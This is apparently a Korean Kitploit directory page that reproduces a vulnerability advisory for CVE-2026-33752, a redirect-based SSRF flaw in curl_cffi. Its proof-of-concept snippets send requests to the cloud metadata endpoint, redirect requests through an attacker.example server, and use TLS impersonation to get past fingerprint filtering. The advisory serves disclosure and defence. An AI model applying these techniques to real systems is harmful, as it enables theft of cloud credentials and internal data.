Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-33752 — curl_cffi에서 리디렉션 기반 SSRF 취약점을 시연하여 내부 네트워크 접근을 가능하게 하며, PoC 코드와 TLS 위장 우회 분석을 포함합니다. | Kitploit
도구/GitHubGitHub/redyank/cve-2026-33752
Vulnerability AnalysisExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubredyank/cve-2026-33752

CVE-2026-33752

curl_cffi에서 리디렉션 기반 SSRF 취약점을 시연하여 내부 네트워크 접근을 가능하게 하며, PoC 코드와 TLS 위장 우회 분석을 포함합니다.

저장소 보기
14개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-33752

CVE-2026-33752(리다이렉트 기반 SSRF로 인한 curl_cffi의 내부 네트워크 접근)

요약

curl_cffi는 내부 IP 범위에 대한 요청을 제한하지 않으며, 기본 libcurl을 통해 리다이렉트를 자동으로 따릅니다.

이로 인해 공격자가 제어하는 URL이 클라우드 메타데이터 엔드포인트와 같은 내부 서비스로 요청을 리다이렉트할 수 있습니다. 또한 curl_cffi의 TLS 위장(impersonation) 기능은 이러한 요청을 합법적인 브라우저 트래픽처럼 보이게 하여 특정 네트워크 제어를 우회할 수 있습니다.

세부 사항

이 문제는 curl_cffi가 아웃바운드 요청을 처리하는 방식에서 발생합니다.

  • 사용자가 제공한 URL은 내부 IP 범위(예: 127.0.0.1, 169.254.0.0/16)로 확인되는지 검사하지 않고 libcurl에 직접 전달됩니다.
  • 리다이렉트는 libcurl 내부에서 자동으로 따릅니다(CURLOPT_FOLLOWLOCATION = 1).
  • Python 계층에서는 리다이렉트 대상에 대한 검증이 없습니다.

즉, 애플리케이션이 외부 URL에 대한 요청만 허용하더라도 공격자는 다음을 수행할 수 있습니다.

  • 공격자가 제어하는 서버를 가리키는 URL 제공
  • 내부 서비스를 가리키는 리다이렉트 응답 반환
  • curl_cffi가 해당 리다이렉트를 자동으로 따르도록 함

결과적으로 내부 엔드포인트(예: 클라우드 인스턴스 메타데이터 API)에 접근할 수 있습니다.

또한 curl_cffi는 TLS 지문 위장(예: impersonate="chrome")을 지원합니다. 아웃바운드 요청이 TLS 지문 기반으로 필터링되는 환경에서는 이러한 요청을 탐지하거나 차단하기가 더 어려워질 수 있습니다.

이 동작은 이전에 보고된 리다이렉트 기반 SSRF 문제(예: CVE-2025-68616)와 유사하며, 리다이렉트를 통해 의도하지 않은 내부 리소스에 접근할 수 있었습니다.

PoC

  1. 직접적인 내부 요청
root@kitploit:~
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
  1. 내부 서비스로 리다이렉트 공격자 서버:
root@kitploit:~
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/

피해자 코드:

root@kitploit:~
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)

결과

  • 초기 요청은 공격자 서버로 전송됨
  • 리다이렉트가 반환됨
  • libcurl이 리다이렉트를 자동으로 따름
  • 내부 메타데이터 엔드포인트에 접근됨
  1. TLS 위장 사용
root@kitploit:~
import curl_cffi\
resp = curl_cffi.get(
    "https://attacker.example/test",
    impersonate="chrome")

일부 환경에서는 이 기능이 TLS 기반 필터링 제어를 우회하는 데 도움이 될 수 있습니다.

영향

요청 URL을 제어할 수 있는 공격자는 다음을 수행할 수 있습니다.

  • 내부 네트워크 서비스에 접근
  • 클라우드 메타데이터 엔드포인트에 도달하여 민감한 정보 탈취
  • 특정 아웃바운드 필터링 메커니즘 우회(환경에 따라 다름) 이는 CWE-918 서버 측 요청 위조(Server-Side Request Forgery)에 해당합니다.
도구 다운로드